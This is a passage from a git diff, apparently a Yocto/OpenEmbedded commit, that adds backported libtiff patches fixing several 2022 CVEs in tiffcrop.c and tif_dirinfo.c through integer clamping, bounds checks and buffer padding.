++ length = _TIFFClampDoubleToUInt32(crop->length);
+ else
+ length = image->length - tmargin - bmargin;
+ }
+ else
+ {
+ if (crop->crop_mode & CROP_WIDTH)
+- width = (uint32)(crop->width * scale * image->xres);
++ width = _TIFFClampDoubleToUInt32(crop->width * scale * image->xres);
+ else
+ width = image->width - lmargin - rmargin;
+
+ if (crop->crop_mode & CROP_LENGTH)
+- length = (uint32)(crop->length * scale * image->yres);
++ length = _TIFFClampDoubleToUInt32(crop->length * scale * image->yres);
+ else
+ length = image->length - tmargin - bmargin;
+ }
+@@ -5670,13 +5670,13 @@ computeOutputPixelOffsets (struct crop_mask *crop, struct image_data *image,
+ {
+ if (page->res_unit == RESUNIT_INCH || page->res_unit == RESUNIT_CENTIMETER)
+ { /* inches or centimeters specified */
+- hmargin = (uint32)(page->hmargin * scale * page->hres * ((image->bps + 7)/ 8));
+- vmargin = (uint32)(page->vmargin * scale * page->vres * ((image->bps + 7)/ 8));
++ hmargin = _TIFFClampDoubleToUInt32(page->hmargin * scale * page->hres * ((image->bps + 7) / 8));
++ vmargin = _TIFFClampDoubleToUInt32(page->vmargin * scale * page->vres * ((image->bps + 7) / 8));
+ }
+ else
+ { /* Otherwise user has specified pixels as reference unit */
+- hmargin = (uint32)(page->hmargin * scale * ((image->bps + 7)/ 8));
+- vmargin = (uint32)(page->vmargin * scale * ((image->bps + 7)/ 8));
++ hmargin = _TIFFClampDoubleToUInt32(page->hmargin * scale * ((image->bps + 7) / 8));
++ vmargin = _TIFFClampDoubleToUInt32(page->vmargin * scale * ((image->bps + 7) / 8));
+ }
+
+ if ((hmargin * 2.0) > (pwidth * page->hres))
+@@ -5714,13 +5714,13 @@ computeOutputPixelOffsets (struct crop_mask *crop, struct image_data *image,
+ {
+ if (page->mode & PAGE_MODE_PAPERSIZE )
+ {
+- owidth = (uint32)((pwidth * page->hres) - (hmargin * 2));
+- olength = (uint32)((plength * page->vres) - (vmargin * 2));
++ owidth = _TIFFClampDoubleToUInt32((pwidth * page->hres) - (hmargin * 2));
++ olength = _TIFFClampDoubleToUInt32((plength * page->vres) - (vmargin * 2));
+ }
+ else
+ {
+- owidth = (uint32)(iwidth - (hmargin * 2 * page->hres));
+- olength = (uint32)(ilength - (vmargin * 2 * page->vres));
++ owidth = _TIFFClampDoubleToUInt32(iwidth - (hmargin * 2 * page->hres));
++ olength = _TIFFClampDoubleToUInt32(ilength - (vmargin * 2 * page->vres));
+ }
+ }
+
+@@ -5729,6 +5729,12 @@ computeOutputPixelOffsets (struct crop_mask *crop, struct image_data *image,
+ if (olength > ilength)
+ olength = ilength;
+
++ if (owidth == 0 || olength == 0)
++ {
++ TIFFError("computeOutputPixelOffsets", "Integer overflow when calculating the number of pages");
++ exit(EXIT_FAILURE);
++ }
++
+ /* Compute the number of pages required for Portrait or Landscape */
+ switch (page->orient)
+ {
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch
new file mode 100644
index 0000000000..131ff94119
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch
@@ -0,0 +1,159 @@
+From 07d79fcac2ead271b60e32aeb80f7b4f3be9ac8c Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Wed, 9 Feb 2022 21:31:29 +0000
+Subject: [PATCH] tiffcrop.c: Fix issue #352 heap-buffer-overflow by correcting
+ uint32_t underflow.
+
+CVE: CVE-2022-2867 CVE-2022-2868 CVE-2022-2869
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/07d79fcac2ead271b60e32aeb80f7b4f3be9ac8c]
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+---
+Index: tiff-4.1.0/tools/tiffcrop.c
+===================================================================
+--- tiff-4.1.0.orig/tools/tiffcrop.c
++++ tiff-4.1.0/tools/tiffcrop.c
+@@ -5153,29 +5153,45 @@ computeInputPixelOffsets(struct crop_mas
+ y1 = _TIFFClampDoubleToUInt32(crop->corners[i].Y1);
+ y2 = _TIFFClampDoubleToUInt32(crop->corners[i].Y2);
+ }
+- if (x1 < 1)
+- crop->regionlist[i].x1 = 0;
+- else
+- crop->regionlist[i].x1 = (uint32) (x1 - 1);
++ /* a) Region needs to be within image sizes 0.. width-1; 0..length-1
++ * b) Corners are expected to be submitted as top-left to bottom-right.
++ * Therefore, check that and reorder input.
++ * (be aware x,y are already casted to (uint32_t) and avoid (0 - 1) )
++ */
++ uint32_t aux;
++ if (x1 > x2) {
++ aux = x1;
++ x1 = x2;
++ x2 = aux;
++ }
++ if (y1 > y2) {
++ aux = y1;
++ y1 = y2;
++ y2 = aux;
++ }
++ if (x1 > image->width - 1)
++ crop->regionlist[i].x1 = image->width - 1;
++ else if (x1 > 0)
++ crop->regionlist[i].x1 = (uint32_t)(x1 - 1);
+
+ if (x2 > image->width - 1)
+ crop->regionlist[i].x2 = image->width - 1;
+- else
+- crop->regionlist[i].x2 = (uint32) (x2 - 1);
+- zwidth = crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1;
+-
+- if (y1 < 1)
+- crop->regionlist[i].y1 = 0;
+- else
+- crop->regionlist[i].y1 = (uint32) (y1 - 1);
++ else if (x2 > 0)
++ crop->regionlist[i].x2 = (uint32_t)(x2 - 1);
++
++ zwidth = crop->regionlist[i].x2 - crop->regionlist[i].x1 + 1;
++
++ if (y1 > image->length - 1)
++ crop->regionlist[i].y1 = image->length - 1;
++ else if (y1 > 0)
++ crop->regionlist[i].y1 = (uint32_t)(y1 - 1);
+
+ if (y2 > image->length - 1)
+ crop->regionlist[i].y2 = image->length - 1;
+- else
+- crop->regionlist[i].y2 = (uint32) (y2 - 1);
+-
+- zlength = crop->regionlist[i].y2 - crop->regionlist[i].y1 + 1;
++ else if (y2 > 0)
++ crop->regionlist[i].y2 = (uint32_t)(y2 - 1);
+
++ zlength = crop->regionlist[i].y2 - crop->regionlist[i].y1 + 1;
+ if (zwidth > max_width)
+ max_width = zwidth;
+ if (zlength > max_length)
+@@ -5205,7 +5221,7 @@ computeInputPixelOffsets(struct crop_mas
+ }
+ }
+ return (0);
+- }
++ } /* crop_mode == CROP_REGIONS */
+
+ /* Convert crop margins into offsets into image
+ * Margins are expressed as pixel rows and columns, not bytes
+@@ -5241,7 +5257,7 @@ computeInputPixelOffsets(struct crop_mas
+ bmargin = (uint32) 0;
+ return (-1);
+ }
+- }
++ } /* crop_mode == CROP_MARGINS */
+ else
+ { /* no margins requested */
+ tmargin = (uint32) 0;
+@@ -5332,24 +5348,23 @@ computeInputPixelOffsets(struct crop_mas
+ off->endx = endx;
+ off->endy = endy;
+
+- crop_width = endx - startx + 1;
+- crop_length = endy - starty + 1;
+-
+- if (crop_width <= 0)
++ if (endx + 1 <= startx)
+ {
+ TIFFError("computeInputPixelOffsets",
+ "Invalid left/right margins and /or image crop width requested");
+ return (-1);
+ }
++ crop_width = endx - startx + 1;
+ if (crop_width > image->width)
+ crop_width = image->width;
+
+- if (crop_length <= 0)
++ if (endy + 1 <= starty)
+ {
+ TIFFError("computeInputPixelOffsets",
+ "Invalid top/bottom margins and /or image crop length requested");
+ return (-1);
+ }
++ crop_length = endy - starty + 1;
+ if (crop_length > image->length)
+ crop_length = image->length;
+
+@@ -5449,10 +5464,17 @@ getCropOffsets(struct image_data *image,
+ else
+ crop->selections = crop->zones;
+
+- for (i = 0; i < crop->zones; i++)
++ /* Initialize regions iterator i */
++ i = 0;
++ for (int j = 0; j < crop->zones; j++)
+ {
+- seg = crop->zonelist[i].position;
+- total = crop->zonelist[i].total;
++ seg = crop->zonelist[j].position;
++ total = crop->zonelist[j].total;
++
++ /* check for not allowed zone cases like 0:0; 4:3; etc. and skip that input */
++ if (seg == 0 || total == 0 || seg > total) {
++ continue;
++ }
+
+ switch (crop->edge_ref)
+ {
+@@ -5581,8 +5603,11 @@ getCropOffsets(struct image_data *image,
+ i + 1, (uint32)zwidth, (uint32)zlength,
+ crop->regionlist[i].x1, crop->regionlist[i].x2,
+ crop->regionlist[i].y1, crop->regionlist[i].y2);
++ /* increment regions iterator */
++ i++;
+ }
+-
++ /* set number of generated regions out of given zones */
++ crop->selections = i;
+ return (0);
+ } /* end getCropOffsets */
+
+--
+GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch
new file mode 100644
index 0000000000..cf440ce55f
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch
@@ -0,0 +1,29 @@
+From 06386cc9dff5dc162006abe11fd4d1a6fad616cc Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 18 Aug 2022 09:40:50 +0530
+Subject: [PATCH] CVE-2022-34526
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/275735d0354e39c0ac1dc3c0db2120d6f31d1990]
+CVE: CVE-2022-34526
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_dirinfo.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/libtiff/tif_dirinfo.c b/libtiff/tif_dirinfo.c
+index 52d53d4..4a1ca00 100644
+--- a/libtiff/tif_dirinfo.c
++++ b/libtiff/tif_dirinfo.c
+@@ -983,6 +983,9 @@ _TIFFCheckFieldIsValidForCodec(TIFF *tif, ttag_t tag)
+ default:
+ return 1;
+ }
++ if( !TIFFIsCODECConfigured(tif->tif_dir.td_compression) ) {
++ return 0;
++ }
+ /* Check if codec specific tags are allowed for the current
+ * compression scheme (codec) */
+ switch (tif->tif_dir.td_compression) {
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch
new file mode 100644
index 0000000000..760e20dd2b
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch
@@ -0,0 +1,659 @@
+From 226e336cdceec933da2e9f72b6578c7a1bea450b Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Thu, 13 Oct 2022 14:33:27 +0000
+Subject: [PATCH] tiffcrop subroutines require a larger buffer (fixes #271,
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3570 CVE-2022-3598
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/cfbb883bf6ea7bedcb04177cc4e52d304522fdff
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/24d3b2425af24432e0e4e2fd58b33f3b04c4bfa4
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+ #381, #386, #388, #389, #435)
+
+---
+ tools/tiffcrop.c | 209 ++++++++++++++++++++++++++---------------------
+ 1 file changed, 117 insertions(+), 92 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index c7877aa..c923920 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -126,6 +126,7 @@ static char tiffcrop_rev_date[] = "03-03-2010";
+
+ #ifdef HAVE_STDINT_H
+ # include <stdint.h>
++# include <inttypes.h>
+ #endif
+
+ #ifndef HAVE_GETOPT
+@@ -212,6 +213,10 @@ extern int getopt(int argc, char * const argv[], const char *optstring);
+
+ #define TIFF_DIR_MAX 65534
+
++/* Some conversion subroutines require image buffers, which are at least 3 bytes
++ * larger than the necessary size for the image itself. */
++#define NUM_BUFF_OVERSIZE_BYTES 3
++
+ /* Offsets into buffer for margins and fixed width and length segments */
+ struct offset {
+ uint32 tmargin;
+@@ -233,7 +238,7 @@ struct offset {
+ */
+
+ struct buffinfo {
+- uint32 size; /* size of this buffer */
++ size_t size; /* size of this buffer */
+ unsigned char *buffer; /* address of the allocated buffer */
+ };
+
+@@ -771,8 +776,8 @@ static int readContigTilesIntoBuffer (TIFF* in, uint8* buf,
+ uint32 dst_rowsize, shift_width;
+ uint32 bytes_per_sample, bytes_per_pixel;
+ uint32 trailing_bits, prev_trailing_bits;
+- uint32 tile_rowsize = TIFFTileRowSize(in);
+- uint32 src_offset, dst_offset;
++ tmsize_t tile_rowsize = TIFFTileRowSize(in);
++ tmsize_t src_offset, dst_offset;
+ uint32 row_offset, col_offset;
+ uint8 *bufp = (uint8*) buf;
+ unsigned char *src = NULL;
+@@ -822,7 +827,7 @@ static int readContigTilesIntoBuffer (TIFF* in, uint8* buf,
+ TIFFError("readContigTilesIntoBuffer", "Integer overflow when calculating buffer size.");
+ exit(-1);
+ }
+- tilebuf = _TIFFmalloc(tile_buffsize + 3);
++ tilebuf = _TIFFmalloc(tile_buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (tilebuf == 0)
+ return 0;
+ tilebuf[tile_buffsize] = 0;
+@@ -986,7 +991,7 @@ static int readSeparateTilesIntoBuffer (TIFF* in, uint8 *obuf,
+ for (sample = 0; (sample < spp) && (sample < MAX_SAMPLES); sample++)
+ {
+ srcbuffs[sample] = NULL;
+- tbuff = (unsigned char *)_TIFFmalloc(tilesize + 8);
++ tbuff = (unsigned char *)_TIFFmalloc(tilesize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!tbuff)
+ {
+ TIFFError ("readSeparateTilesIntoBuffer",
+@@ -1181,7 +1186,8 @@ writeBufferToSeparateStrips (TIFF* out, uint8* buf,
+ }
+ rowstripsize = rowsperstrip * bytes_per_sample * (width + 1);
+
+- obuf = _TIFFmalloc (rowstripsize);
++ /* Add 3 padding bytes for extractContigSamples32bits */
++ obuf = _TIFFmalloc (rowstripsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (obuf == NULL)
+ return 1;
+
+@@ -1194,7 +1200,7 @@ writeBufferToSeparateStrips (TIFF* out, uint8* buf,
+ stripsize = TIFFVStripSize(out, nrows);
+ src = buf + (row * rowsize);
+ total_bytes += stripsize;
+- memset (obuf, '\0', rowstripsize);
++ memset (obuf, '\0',rowstripsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (extractContigSamplesToBuffer(obuf, src, nrows, width, s, spp, bps, dump))
+ {
+ _TIFFfree(obuf);
+@@ -1202,10 +1208,15 @@ writeBufferToSeparateStrips (TIFF* out, uint8* buf,
+ }
+ if ((dump->outfile != NULL) && (dump->level == 1))
+ {
+- dump_info(dump->outfile, dump->format,"",
++ if ((uint64_t)scanlinesize > 0x0ffffffffULL) {
++ dump_info(dump->infile, dump->format, "loadImage",
++ "Attention: scanlinesize %"PRIu64" is larger than UINT32_MAX.\nFollowing dump might be wrong.",
++ (uint64_t)scanlinesize);
++ }
++ dump_info(dump->outfile, dump->format,"",
+ "Sample %2d, Strip: %2d, bytes: %4d, Row %4d, bytes: %4d, Input offset: %6d",
+- s + 1, strip + 1, stripsize, row + 1, scanlinesize, src - buf);
+- dump_buffer(dump->outfile, dump->format, nrows, scanlinesize, row, obuf);
++ s + 1, strip + 1, stripsize, row + 1, (uint32)scanlinesize, src - buf);
++ dump_buffer(dump->outfile, dump->format, nrows, (uint32)scanlinesize, row, obuf);
+ }
+
+ if (TIFFWriteEncodedStrip(out, strip++, obuf, stripsize) < 0)
+@@ -1232,7 +1243,7 @@ static int writeBufferToContigTiles (TIFF* out, uint8* buf, uint32 imagelength,
+ uint32 tl, tw;
+ uint32 row, col, nrow, ncol;
+ uint32 src_rowsize, col_offset;
+- uint32 tile_rowsize = TIFFTileRowSize(out);
++ tmsize_t tile_rowsize = TIFFTileRowSize(out);
+ uint8* bufp = (uint8*) buf;
+ tsize_t tile_buffsize = 0;
+ tsize_t tilesize = TIFFTileSize(out);
+@@ -1275,9 +1286,11 @@ static int writeBufferToContigTiles (TIFF* out, uint8* buf, uint32 imagelength,
+ }
+ src_rowsize = ((imagewidth * spp * bps) + 7U) / 8;
+
+- tilebuf = _TIFFmalloc(tile_buffsize);
++ /* Add 3 padding bytes for extractContigSamples32bits */
++ tilebuf = _TIFFmalloc(tile_buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (tilebuf == 0)
+ return 1;
++ memset(tilebuf, 0, tile_buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ for (row = 0; row < imagelength; row += tl)
+ {
+ nrow = (row + tl > imagelength) ? imagelength - row : tl;
+@@ -1323,7 +1336,8 @@ static int writeBufferToSeparateTiles (TIFF* out, uint8* buf, uint32 imagelength
+ uint32 imagewidth, tsample_t spp,
+ struct dump_opts * dump)
+ {
+- tdata_t obuf = _TIFFmalloc(TIFFTileSize(out));
++ /* Add 3 padding bytes for extractContigSamples32bits */
++ tdata_t obuf = _TIFFmalloc(TIFFTileSize(out) + NUM_BUFF_OVERSIZE_BYTES);
+ uint32 tl, tw;
+ uint32 row, col, nrow, ncol;
+ uint32 src_rowsize, col_offset;
+@@ -1333,6 +1347,7 @@ static int writeBufferToSeparateTiles (TIFF* out, uint8* buf, uint32 imagelength
+
+ if (obuf == NULL)
+ return 1;
++ memset(obuf, 0, TIFFTileSize(out) + NUM_BUFF_OVERSIZE_BYTES);
+
+ TIFFGetField(out, TIFFTAG_TILELENGTH, &tl);
+ TIFFGetField(out, TIFFTAG_TILEWIDTH, &tw);
+@@ -1754,14 +1769,14 @@ void process_command_opts (int argc, char *argv[], char *mp, char *mode, uint32
+
+ *opt_offset = '\0';
+ /* convert option to lowercase */
+- end = strlen (opt_ptr);
++ end = (unsigned int)strlen (opt_ptr);
+ for (i = 0; i < end; i++)
+ *(opt_ptr + i) = tolower((int) *(opt_ptr + i));
+ /* Look for dump format specification */
+ if (strncmp(opt_ptr, "for", 3) == 0)
+ {
+ /* convert value to lowercase */
+- end = strlen (opt_offset + 1);
++ end = (unsigned int)strlen (opt_offset + 1);
+ for (i = 1; i <= end; i++)
+ *(opt_offset + i) = tolower((int) *(opt_offset + i));
+ /* check dump format value */
+@@ -2213,6 +2228,8 @@ main(int argc, char* argv[])
+ size_t length;
+ char temp_filename[PATH_MAX + 16]; /* Extra space keeps the compiler from complaining */
+
++ assert(NUM_BUFF_OVERSIZE_BYTES >= 3);
++
+ little_endian = *((unsigned char *)&little_endian) & '1';
+
+ initImageData(&image);
+@@ -3114,13 +3131,13 @@ extractContigSamples32bits (uint8 *in, uint8 *out, uint32 cols,
+ /* If we have a full buffer's worth, write it out */
+ if (ready_bits >= 32)
+ {
+- bytebuff1 = (buff2 >> 56);
++ bytebuff1 = (uint8)(buff2 >> 56);
+ *dst++ = bytebuff1;
+- bytebuff2 = (buff2 >> 48);
++ bytebuff2 = (uint8)(buff2 >> 48);
+ *dst++ = bytebuff2;
+- bytebuff3 = (buff2 >> 40);
++ bytebuff3 = (uint8)(buff2 >> 40);
+ *dst++ = bytebuff3;
+- bytebuff4 = (buff2 >> 32);
++ bytebuff4 = (uint8)(buff2 >> 32);
+ *dst++ = bytebuff4;
+ ready_bits -= 32;
+
+@@ -3495,13 +3512,13 @@ extractContigSamplesShifted32bits (uint8 *in, uint8 *out, uint32 cols,
+ }
+ else /* If we have a full buffer's worth, write it out */
+ {
+- bytebuff1 = (buff2 >> 56);
++ bytebuff1 = (uint8)(buff2 >> 56);
+ *dst++ = bytebuff1;
+- bytebuff2 = (buff2 >> 48);
++ bytebuff2 = (uint8)(buff2 >> 48);
+ *dst++ = bytebuff2;
+- bytebuff3 = (buff2 >> 40);
++ bytebuff3 = (uint8)(buff2 >> 40);
+ *dst++ = bytebuff3;
+- bytebuff4 = (buff2 >> 32);
++ bytebuff4 = (uint8)(buff2 >> 32);
+ *dst++ = bytebuff4;
+ ready_bits -= 32;
+
+@@ -3678,10 +3695,10 @@ extractContigSamplesToTileBuffer(uint8 *out, uint8 *in, uint32 rows, uint32 cols
+ static int readContigStripsIntoBuffer (TIFF* in, uint8* buf)
+ {
+ uint8* bufp = buf;
+- int32 bytes_read = 0;
++ tmsize_t bytes_read = 0;
+ uint32 strip, nstrips = TIFFNumberOfStrips(in);
+- uint32 stripsize = TIFFStripSize(in);
+- uint32 rows = 0;
++ tmsize_t stripsize = TIFFStripSize(in);
++ tmsize_t rows = 0;
+ uint32 rps = TIFFGetFieldDefaulted(in, TIFFTAG_ROWSPERSTRIP, &rps);
+ tsize_t scanline_size = TIFFScanlineSize(in);
+
+@@ -3694,13 +3711,12 @@ static int readContigStripsIntoBuffer (TIFF* in, uint8* buf)
+ bytes_read = TIFFReadEncodedStrip (in, strip, bufp, -1);
+ rows = bytes_read / scanline_size;
+ if ((strip < (nstrips - 1)) && (bytes_read != (int32)stripsize))
+- TIFFError("", "Strip %d: read %lu bytes, strip size %lu",
+- (int)strip + 1, (unsigned long) bytes_read,
+- (unsigned long)stripsize);
++ TIFFError("", "Strip %"PRIu32": read %"PRId64" bytes, strip size %"PRIu64,
++ strip + 1, bytes_read, stripsize);
+
+ if (bytes_read < 0 && !ignore) {
+- TIFFError("", "Error reading strip %lu after %lu rows",
+- (unsigned long) strip, (unsigned long)rows);
++ TIFFError("", "Error reading strip %"PRIu32" after %"PRIu64" rows",
++ strip, rows);
+ return 0;
+ }
+ bufp += stripsize;
+@@ -4164,13 +4180,13 @@ combineSeparateSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
+ /* If we have a full buffer's worth, write it out */
+ if (ready_bits >= 32)
+ {
+- bytebuff1 = (buff2 >> 56);
++ bytebuff1 = (uint8)(buff2 >> 56);
+ *dst++ = bytebuff1;
+- bytebuff2 = (buff2 >> 48);
++ bytebuff2 = (uint8)(buff2 >> 48);
+ *dst++ = bytebuff2;
+- bytebuff3 = (buff2 >> 40);
++ bytebuff3 = (uint8)(buff2 >> 40);
+ *dst++ = bytebuff3;
+- bytebuff4 = (buff2 >> 32);
++ bytebuff4 = (uint8)(buff2 >> 32);
+ *dst++ = bytebuff4;
+ ready_bits -= 32;
+
+@@ -4213,10 +4229,10 @@ combineSeparateSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
+ "Row %3d, Col %3d, Src byte offset %3d bit offset %2d Dst offset %3d",
+ row + 1, col + 1, src_byte, src_bit, dst - out);
+
+- dump_long (dumpfile, format, "Match bits ", matchbits);
++ dump_wide (dumpfile, format, "Match bits ", matchbits);
+ dump_data (dumpfile, format, "Src bits ", src, 4);
+- dump_long (dumpfile, format, "Buff1 bits ", buff1);
+- dump_long (dumpfile, format, "Buff2 bits ", buff2);
++ dump_wide (dumpfile, format, "Buff1 bits ", buff1);
++ dump_wide (dumpfile, format, "Buff2 bits ", buff2);
+ dump_byte (dumpfile, format, "Write bits1", bytebuff1);
+ dump_byte (dumpfile, format, "Write bits2", bytebuff2);
+ dump_info (dumpfile, format, "", "Ready bits: %2d", ready_bits);
+@@ -4689,13 +4705,13 @@ combineSeparateTileSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
+ /* If we have a full buffer's worth, write it out */
+ if (ready_bits >= 32)
+ {
+- bytebuff1 = (buff2 >> 56);
++ bytebuff1 = (uint8)(buff2 >> 56);
+ *dst++ = bytebuff1;
+- bytebuff2 = (buff2 >> 48);
++ bytebuff2 = (uint8)(buff2 >> 48);
+ *dst++ = bytebuff2;
+- bytebuff3 = (buff2 >> 40);
++ bytebuff3 = (uint8)(buff2 >> 40);
+ *dst++ = bytebuff3;
+- bytebuff4 = (buff2 >> 32);
++ bytebuff4 = (uint8)(buff2 >> 32);
+ *dst++ = bytebuff4;
+ ready_bits -= 32;
+
+@@ -4738,10 +4754,10 @@ combineSeparateTileSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
+ "Row %3d, Col %3d, Src byte offset %3d bit offset %2d Dst offset %3d",
+ row + 1, col + 1, src_byte, src_bit, dst - out);
+
+- dump_long (dumpfile, format, "Match bits ", matchbits);
++ dump_wide (dumpfile, format, "Match bits ", matchbits);
+ dump_data (dumpfile, format, "Src bits ", src, 4);
+- dump_long (dumpfile, format, "Buff1 bits ", buff1);
+- dump_long (dumpfile, format, "Buff2 bits ", buff2);
++ dump_wide (dumpfile, format, "Buff1 bits ", buff1);
++ dump_wide (dumpfile, format, "Buff2 bits ", buff2);
+ dump_byte (dumpfile, format, "Write bits1", bytebuff1);
+ dump_byte (dumpfile, format, "Write bits2", bytebuff2);
+ dump_info (dumpfile, format, "", "Ready bits: %2d", ready_bits);
+@@ -4764,7 +4780,7 @@ static int readSeparateStripsIntoBuffer (TIFF *in, uint8 *obuf, uint32 length,
+ {
+ int i, bytes_per_sample, bytes_per_pixel, shift_width, result = 1;
+ uint32 j;
+- int32 bytes_read = 0;
++ tmsize_t bytes_read = 0;
+ uint16 bps = 0, planar;
+ uint32 nstrips;
+ uint32 strips_per_sample;
+@@ -4830,7 +4846,7 @@ static int readSeparateStripsIntoBuffer (TIFF *in, uint8 *obuf, uint32 length,
+ for (s = 0; (s < spp) && (s < MAX_SAMPLES); s++)
+ {
+ srcbuffs[s] = NULL;
+- buff = _TIFFmalloc(stripsize + 3);
++ buff = _TIFFmalloc(stripsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!buff)
+ {
+ TIFFError ("readSeparateStripsIntoBuffer",
+@@ -4853,7 +4869,7 @@ static int readSeparateStripsIntoBuffer (TIFF *in, uint8 *obuf, uint32 length,
+ buff = srcbuffs[s];
+ strip = (s * strips_per_sample) + j;
+ bytes_read = TIFFReadEncodedStrip (in, strip, buff, stripsize);
+- rows_this_strip = bytes_read / src_rowsize;
++ rows_this_strip = (uint32)(bytes_read / src_rowsize);
+ if (bytes_read < 0 && !ignore)
+ {
+ TIFFError(TIFFFileName(in),
+@@ -5860,13 +5876,14 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ uint16 input_compression = 0, input_photometric = 0;
+ uint16 subsampling_horiz, subsampling_vert;
+ uint32 width = 0, length = 0;
+- uint32 stsize = 0, tlsize = 0, buffsize = 0, scanlinesize = 0;
++ tmsize_t stsize = 0, tlsize = 0, buffsize = 0;
++ tmsize_t scanlinesize = 0;
+ uint32 tw = 0, tl = 0; /* Tile width and length */
+- uint32 tile_rowsize = 0;
++ tmsize_t tile_rowsize = 0;
+ unsigned char *read_buff = NULL;
+ unsigned char *new_buff = NULL;
+ int readunit = 0;
+- static uint32 prev_readsize = 0;
++ static tmsize_t prev_readsize = 0;
+
+ TIFFGetFieldDefaulted(in, TIFFTAG_BITSPERSAMPLE, &bps);
+ TIFFGetFieldDefaulted(in, TIFFTAG_SAMPLESPERPIXEL, &spp);
+@@ -6168,7 +6185,7 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
+ return (-1);
+ }
+- read_buff = (unsigned char *)_TIFFmalloc(buffsize+3);
++ read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ {
+@@ -6179,11 +6196,11 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
+ return (-1);
+ }
+- new_buff = _TIFFrealloc(read_buff, buffsize+3);
++ new_buff = _TIFFrealloc(read_buff, buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!new_buff)
+ {
+ free (read_buff);
+- read_buff = (unsigned char *)_TIFFmalloc(buffsize+3);
++ read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ read_buff = new_buff;
+@@ -6256,8 +6273,13 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+ dump_info (dump->infile, dump->format, "",
+ "Bits per sample %d, Samples per pixel %d", bps, spp);
+
++ if ((uint64_t)scanlinesize > 0x0ffffffffULL) {
++ dump_info(dump->infile, dump->format, "loadImage",
++ "Attention: scanlinesize %"PRIu64" is larger than UINT32_MAX.\nFollowing dump might be wrong.",
++ (uint64_t)scanlinesize);
++ }
+ for (i = 0; i < length; i++)
+- dump_buffer(dump->infile, dump->format, 1, scanlinesize,
++ dump_buffer(dump->infile, dump->format, 1, (uint32)scanlinesize,
+ i, read_buff + (i * scanlinesize));
+ }
+ return (0);
+@@ -7277,13 +7299,13 @@ writeSingleSection(TIFF *in, TIFF *out, struct image_data *image,
+ if (TIFFGetField(in, TIFFTAG_NUMBEROFINKS, &ninks)) {
+ TIFFSetField(out, TIFFTAG_NUMBEROFINKS, ninks);
+ if (TIFFGetField(in, TIFFTAG_INKNAMES, &inknames)) {
+- int inknameslen = strlen(inknames) + 1;
++ int inknameslen = (int)strlen(inknames) + 1;
+ const char* cp = inknames;
+ while (ninks > 1) {
+ cp = strchr(cp, '\0');
+ if (cp) {
+ cp++;
+- inknameslen += (strlen(cp) + 1);
++ inknameslen += ((int)strlen(cp) + 1);
+ }
+ ninks--;
+ }
+@@ -7346,23 +7368,23 @@ createImageSection(uint32 sectsize, unsigned char **sect_buff_ptr)
+
+ if (!sect_buff)
+ {
+- sect_buff = (unsigned char *)_TIFFmalloc(sectsize);
++ sect_buff = (unsigned char *)_TIFFmalloc(sectsize + NUM_BUFF_OVERSIZE_BYTES);
+ if (!sect_buff)
+ {
+ TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
+ return (-1);
+ }
+- _TIFFmemset(sect_buff, 0, sectsize);
++ _TIFFmemset(sect_buff, 0, sectsize + NUM_BUFF_OVERSIZE_BYTES);
+ }
+ else
+ {
+ if (prev_sectsize < sectsize)
+ {
